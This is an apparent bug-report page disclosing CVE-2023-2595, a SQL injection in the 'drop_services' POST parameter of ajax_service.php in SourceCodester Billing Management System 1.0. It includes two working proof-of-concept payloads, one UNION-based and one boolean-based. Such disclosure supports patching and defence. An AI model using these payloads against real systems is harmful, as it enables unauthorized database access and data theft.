Headline
CVE-2023-2595: bug_report/SQLi-1.md at main · Yastar/bug_report
A vulnerability has been found in SourceCodester Billing Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file ajax_service.php of the component POST Parameter Handler. The manipulation of the argument drop_services leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228397 was assigned to this vulnerability.
Billing Management System v1.0 has SQL injection
BUG_Author:yastar
Website source code address: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
Vulnerability File: /smartbilling_source_code/ajax_service.php
POST parameter ‘drop_services’ exists SQL injection vulnerability
Payload1:drop_services=-1’ union all select null,null,null,null,concat(0x616263,0x2526272829),null,null,null,null-- -
Payload2:drop_services=1’ and 999=999 and 'h’=’h
Boolean judgment is correct, and the page displays normally